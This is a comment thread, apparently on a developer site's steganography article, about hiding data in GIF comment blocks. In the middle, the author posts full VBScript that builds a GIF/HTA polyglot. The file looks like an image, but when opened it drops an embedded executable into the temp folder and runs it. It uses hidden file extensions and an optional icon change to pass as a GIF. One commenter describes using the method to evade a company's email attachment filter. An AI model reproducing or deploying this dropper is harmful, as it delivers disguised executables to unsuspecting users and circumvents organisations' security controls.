|
While this is a very nice way of conducting covert message operations (lol), the image does not display in all applications. I've only tried a couple of apps (as a test), and it doesn't show up in the default Windows Picture and Fax Viewer.
Not saying that this is a great app, but I'm sure a lot of people (including myself) use it for quick double-click viewing.
~Brad / Disrupted
|
|
|
|
|
True ... but at least it's viewable in IE/Firefox.
I'll have to investigate why it fails for some apps ... most likely I've violated
the GIF file format comment block.
|
|
|
|
|
I know there is a very destructive use for this kind of thing, but I found a very good use. I read this article today, and put it in the back of my mind.
Anyway, a while later, I was asked to email a file to someone, I did, and it was bounced back. That companies security policy prevented my email attachment from being sent.
Embedding the zip file in a gif however, enabled the sending of this message.
I know this is not an ideal use for this sort of thing, but it is a cool way to send a file.
Thanks for this article.
|
|
|
|
|
Why not just rename the file?
|
|
|
|
|
Yes- just rename your .zip to .txt and send the file thru email.
I've done that many times.
|
|
|
|
|
Most mail servers scan the contents of the file, not just the file names, which was why I was unable to send the mail in the first place. However, the company where I was trying to send the email, only accept picture attachments. Simply renaming the file caused it to bounce back. There are others ways I could have sent the file, but like I said, this is cool, and it works.
|
|
|
|
|
I can't think of a good use for this technique [yet] but thanks for the information
Phil Harding
|
|
|
|
|
It was just a fun idea to embed data into images.
I'm not even really sure of a good use for it, if any.
Thanks.
|
|
|
|
|
Phil Harding wrote:
can't think of a good use for this technique
How about in regular delivered hta style aps - I personally love what one can do with an HTA with ease - but you always have the side effect of if you create something unique - you just gave all your work away
Something like this would at least throw them off track as to what the real source is, used in combination with a few other methods
|
|
|
|
|
I think anyone who actually saves and runs this is crazy, It seems to be a fundamental rule on virus avoidance never to run an executable from an unknown source.
I am not trying to slur the author, I am sure he is genuine, and wants to share the knowledge he has learnt along the way, but how can you know? When source is uploaded, those paranoid amongst us can always view the source to confirm the codes intention.
Being in a minority of one, doesn't make you insane George Orwell However, in my case it does
|
|
|
|
|
True. Even websites like this could contain malicious content, but in this case it doesn't. I think people should be made aware of suspicious coding techniques and let them decide how to use it or not. The zip file contains my vbscript, here's the source code: (see - there's nothing mysterious about it)
If there's sufficient negative comments, I can always remove the article. But, at least you're aware that seemingly harmless GIFs could contain malware.
' Title: Steganography: Hiding Data Within Data.
' Author: Vengy! (-_-)
' Tested: WinXP SP2 IE 6.0
' Email: cyber_flash@hotmail.com
' How it works:
' -------------
' Usage: cscript.exe hide.vbs your.gif your.exe
' This script merges "your.gif" and "your.exe" to create "your.gif.hta.gif",
' which correctly displays using the IE browser.
' If the 'Hide extension for known file types' option is enabled, which is the default setting,
' the "Save Picture As..." downloads it as "your.gif". (it's really "your.gif.hta")
' Important:
' ----------
' Not all GIFs will work!? Trial and error is the best method
' to find suitable images. Included are some working GIFs that
' will merge correctly with any EXE. The image "your.gif" must be a GIF89a type and *not* GIF87a.
' GIF87a Versus GIF89a:
' ---------------------
' There are technically two types of GIF file: GIF87a and the newer, improved GIF89a.
' Both are fully supported on most browsers, and both use .gif as their file name suffix.
' GIF87a is the original format for indexed color images.
' It uses LZW compression and has the option of being interlaced.
' GIF89a is the same, but also includes transparency and animation capabilities.
' If you want to add these features to your graphic, you'll need to create the graphic with a tool
' that supports the GIF89a format. These features have become so popular with web developers that
' this format has become thede facto standard on the Web today.
' +----------------------------------------------------------------------------+
' | Let the games begin! |
' +----------------------------------------------------------------------------+
Option Explicit
Dim data,p,i,f,file,ub,ts,pic_buf,pic,args,x
set args=WScript.Arguments
If args.Count<>2 Then
WScript.Echo "Please type the following: cscript.exe hide.vbs your.gif your.exe"
WScript.Quit
End If
pic=args(0)
file=args(1)
Dim o:Set o=CreateObject("Scripting.FileSystemObject")
Dim s:Set s=CreateObject("WScript.Shell")
'To change the HTA file icon to a GIF, uncomment these 2 lines:
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\","GIF Image","REG_SZ"
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\DefaultIcon\","%SystemRoot%\system32\shimgvw.dll,2","REG_SZ"
Set f=o.CreateTextFile(pic&".hta.gif",2)
WScript.Echo "Processing "&pic&" ..."
pic_buf=RSBinaryToString(ReadBinaryFile(pic))
' Remove end of gif hex tag 3B.
f.Write Left(pic_buf,len(pic_buf)-1)
' +----------------------------------------------------------------------------+
' | BEGIN: GIF comment block. |
' +----------------------------------------------------------------------------+
' Start new block tag.
f.Write chr(Int("&H21"))
' Comment tag.
f.Write chr(Int("&HFE"))
' Length of subblock. Seems to work!?
f.Write chr(Int("&HFF"))
' Start data vbscript
f.WriteLine ""
f.WriteLine "Set o=CreateObject("&chr(34)&"Scripting.FileSystemObject"&chr(34)&")"
f.WriteLine "Set s=CreateObject("&chr(34)&"WScript.Shell"&chr(34)&")"
f.WriteLine "p=o.GetSpecialFolder(2)&"&chr(34)&"\"&file&chr(34)
' Create data hex array.
f.Write "t=split("&chr(34)
WScript.Echo "Processing "&file&" ..."
data=AsciiToHex(RSBinaryToString(ReadBinaryFile(file)))
ub=UBound(data)
For i=0 To ub-1
f.Write data(i)&","
Next
f.Write data(ub)
f.WriteLine chr(34)&","&chr(34)&","&chr(34)&")"
f.WriteLine "Set f=o.CreateTextFile(p,2)"
f.WriteLine "For i=0 To UBound(t)"
f.WriteLine "f.Write chr(Int("&chr(34)&"&H"&chr(34)&"&t(i)))"
f.WriteLine "Next"
f.WriteLine "f.close"
' Run the data!
f.WriteLine "s.run(p)"
f.WriteLine "close()"
' End data vbscript.
f.WriteLine ""
' End of comment block.
f.Write chr(Int("&H00"))
' +----------------------------------------------------------------------------+
' | END: GIF comment block. |
' +----------------------------------------------------------------------------+
' Insert end of gif tag.
f.Write chr(Int("&H3B"))
f.Close
' +----------------------------------------------------------------------------+
' | Done. Your.gif.hta.gif has been created. |
' +----------------------------------------------------------------------------+
Set x=o.GetFile(pic&".hta.gif")
WScript.Echo "Created "&chr(34)&pic&".hta.gif"&chr(34)&" (bytes="&x.Size&")"
' +----------------------------------------------------------------------------+
' | Turns ASCII string sData into array of hex numerics. |
' +----------------------------------------------------------------------------+
Function AsciiToHex(sData)
Dim i, aTmp()
ReDim aTmp(Len(sData) - 1)
For i = 1 To Len(sData)
aTmp(i - 1) = Hex(Asc(Mid(sData, i)))
Next
ASCIItoHex = aTmp
End Function
' +----------------------------------------------------------------------------+
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +----------------------------------------------------------------------------+
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)
If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
Else
RSBinaryToString = ""
End If
End Function
' +----------------------------------------------------------------------------+
' | Read Binary file |
' +----------------------------------------------------------------------------+
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream : Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
BinaryStream.Close
End Function
|
|
|
|
|
Mark Focas wrote:
It seems to be a fundamental rule on virus avoidance never to run an executable from an unknown source.
um, you dont know where you are? You dont know what the author said this was?
Or you do not download anything from the internet, any example projects from here that contain EXEs or make EXEs, no shareware, no freeware, and do you actually know Bill? He might be trying to steal windows back you know.
My god - if this actually a real live exploit - dont you think their would be nine thousand posts telling you so? And I would think that the author would be smarter than to say - hey look at my thingy here that could be an exploit - download it, and I will own you - or hell, could be really trying to mess with ya and already has won.
Jeez- whats the worse thing that can happen? Have not met an exploit yet that has pulled a 357 out on me, nor even one that has figured out a way to hold me hostage until I visit their search engine - in fact - never met one that was still hanging around after a 18 hours of cussing, and finally a reformat - and never really have met one that I probably didnt deserve to get based on my own actions of going around to places that are likely to play that game.
|
|
|
|
|
Your comment would be appreciated by more people if you treated it as an IT professional. My comment was one of the first to be posted. As good as CodeProject is, it is not invulnerable to people who wish to post malicious code.
In answer to your question, no, I do not run executables from this site. If the full source is not included, I do not run it. And no, I do not use freeware or shareware. I use open source (very many, mostly from sourceforge). The very few free non source included executables I use, are from reputable sites that I already know of thru the general programmer community.
I guess, from the vitriol of your post, that you are quite young, and don't have the experience that older members of this community have, so when you mention that 18 hours of cussing and a reformat will cure any problem, well, I have never had to reformat because of a virus. Those 18 hours I would rather spend playing with my kids, reading them books, or making love with my wife.
Good luck, I imagine you will get to be quite an expert on reformatting drives.
|
|
|
|
|
What can possibly be the use for this other than for a virus?
|
|
|
|
|
Yes, this can be used in many different ways from secret communication, trojans, viruses or whatever you can think of.
I just think it's cool to be able to embed data into a host program and still maintain the original.
Thanks.
|
|
|
|
|
Let's just remember to use our powers for good, not for evil.
|
|
|
|
|
Please can you explain the application or use of this process?
I tried your sample and Norton will not like it run until I gave it a full permission.
Best regards,
Paul.
Jesus Christ is LOVE! Please tell somebody.
|
|
|
|
|
The ability to save a .hta from the IE browser probably caused an issue for Norton. Overall, the main point is the ability to embed data into a GIF image as a comment block without altering the main image in anyway. Comments are ignored when rendering the images.
Thanks.
|
|
|
|
|